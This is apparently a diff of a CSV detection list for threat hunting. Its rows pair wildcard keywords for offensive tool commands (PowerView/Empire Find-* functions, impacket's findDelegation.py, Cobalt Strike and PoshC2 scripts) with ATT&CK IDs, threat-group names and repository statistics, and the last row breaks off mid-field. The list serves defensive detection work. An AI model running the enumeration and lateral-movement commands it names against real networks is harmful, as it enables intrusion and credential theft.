+"*Find-AVSignature*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*findDelegation.py -dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*findDelegation.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*Find-DomainShare -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Find-DomainShare -CheckShareAccess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Find-Fruit.*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Find-Fruit.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Find-Fruit.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1108","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*findDelegation.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Find-DomainShare -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-DomainShare -CheckShareAccess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-Fruit.*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Find-Fruit.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-Fruit.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1108","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*findgpocomputeradmin*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Find-GPOComputerAdmin*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" -"*Find-GPOComputerAdmin*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Find-GPOComputerAdmin*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Find-InterestingDomainAcl*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement Enumeration With PowerView","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","N/A","Lateral movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Find-InterestingDomainAcl*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" -"*Find-InterestingDomainAcl*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-InterestingDomainAcl*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*findinterestingdomainsharefile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Find-InterestingDomainShareFile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" -"*Find-InterestingDomainShareFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*find-interestingfile 
-*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Find-InterestingFile*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - 